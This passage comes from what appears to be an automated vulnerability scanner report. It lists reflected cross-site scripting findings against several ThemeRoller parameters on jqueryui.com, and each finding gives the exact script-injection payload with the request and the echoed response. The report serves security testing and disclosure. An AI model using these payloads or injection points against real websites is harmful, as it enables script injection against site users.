GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55b0b60"><script>alert(1)</script>13f84838c4b&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55b0b60"><script>alert(1)</script>13f84838c4b&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

4.598. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e74"><script>alert(1)</script>29c3c2098a8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7542e74"><script>alert(1)</script>29c3c2098a8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7542e74"><script>alert(1)</script>29c3c2098a8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

4.599. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d04"><script>alert(1)</script>ac048d79a1b was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=086d04"><script>alert(1)</script>ac048d79a1b&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=086d04"><script>alert(1)</script>ac048d79a1b&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

4.600. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3880d"><script>alert(1)</script>af0b4bd8dde was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=03880d"><script>alert(1)</script>af0b4bd8dde&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=03880d"><script>alert(1)</script>af0b4bd8dde&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.601. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de2"><script>alert(1)</script>ab3d44f3d57 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb0de2"><script>alert(1)</script>ab3d44f3d57&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb0de2"><script>alert(1)</script>ab3d44f3d57&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

4.602. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca57"><script>alert(1)</script>6ca0f80160 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngcca57"><script>alert(1)</script>6ca0f80160&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 119999

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngcca57"><script>alert(1)</script>6ca0f80160&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

4.603. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 338a7"><script>alert(1)</script>d2e8c6a5d6d was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png338a7"><script>alert(1)</script>d2e8c6a5d6d&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png338a7"><script>alert(1)</script>d2e8c6a5d6d&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

4.604. http://jqueryui.com/themeroller/ [bgTextureError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313a3"><script>alert(1)</script>7e95a01d9ea was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png313a3"><script>alert(1)</script>7e95a01d9ea&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png313a3"><script>alert(1)</script>7e95a01d9ea&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

4.605. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffca3"><script>alert(1)</script>afead0cc52e was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngffca3"><script>alert(1)</script>afead0cc52e&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngffca3"><script>alert(1)</script>afead0cc52e&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

4.606. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4afd"><script>alert(1)</script>5ee5c68dd88 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pnga4afd"><script>alert(1)</script>5ee5c68dd88&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighl